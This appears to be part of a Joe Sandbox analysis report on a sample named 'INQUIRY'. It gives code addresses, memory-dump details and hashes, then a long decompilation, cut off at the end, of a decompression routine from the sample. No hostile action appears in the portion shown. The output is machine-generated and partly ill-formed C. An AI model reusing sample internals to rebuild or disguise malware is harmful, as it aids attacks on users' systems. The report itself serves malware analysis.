0x00406546
0x00406544
0x004064ca
0x004064ca
0x004064cd
0x004064cf
0x004064d2
0x00000000
0x00000000
0x00406231
0x00406231
0x00406235
0x0040687a
0x0040687a
0x00000000
0x0040687a
0x0040623b
0x0040623b
0x0040623e
0x00406241
0x00406244
0x00406247
0x0040624a
0x0040624d
0x0040624f
0x00406252
0x00406255
0x00406258
0x0040625a
0x0040625a
0x0040625a
0x00000000
0x00000000
0x004063bc
0x004063bc
0x004063c0
0x00406886
0x00406886
0x00000000
0x00406886
0x004063c6
0x004063c6
0x004063c9
0x004063cc
0x004063cf
0x004063d1
0x004063d1
0x004063d1
0x004063d4
0x004063d7
0x004063da
0x004063dd
0x004063e0
0x004063e3
0x004063e4
0x004063e6
0x004063e6
0x004063e6
0x004063e9
0x004063ec
0x004063ef
0x004063f2
0x004063f2
0x004063f2
0x004063f5
0x004063f7
0x004063f7
0x00000000
0x00000000
0x00406639
0x00406639
0x00406639
0x0040663d
0x00000000
0x00000000
0x00406643
0x00406643
0x00406646
0x00406649
0x0040664c
0x0040664e
0x0040664e
0x0040664e
0x00406651
0x00406654
0x00406657
0x0040665a
0x0040665d
0x00406660
0x00406661
0x00406663
0x00406663
0x00406663
0x00406666
0x00406669
0x0040666c
0x0040666f
0x00406672
0x00406676
0x00406678
0x0040667b
0x00000000
0x0040667d
0x0040667d
0x004063fa
0x004063fa
0x00000000
0x004063fa
0x0040667b
0x004068b0
0x004068b0
0x00000000
0x00000000
0x00405edf
0x004068e7
0x004068e7
0x00000000
0x004068e7
0x00406734
0x004067b4
0x0040677d

Memory Dump Source

Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4704a5ed105780f6478b7403eb4dd8ec19d01cc9a077ced7c1a67cf9ab5ccc14
Instruction ID: 5ae99ca79f71cc2638d3baaeb57d6c4ee888c8cbc78e3ce5cc4ffc2d3191f51a
Opcode Fuzzy Hash: 4704a5ed105780f6478b7403eb4dd8ec19d01cc9a077ced7c1a67cf9ab5ccc14
Instruction Fuzzy Hash: 1FA13571D00229CBDF28CFA8C854BADBBB1FF44305F15816AD816BB281D7785A86DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00406682 Relevance: 5.2, APIs: 4, Instructions: 208
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406682() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
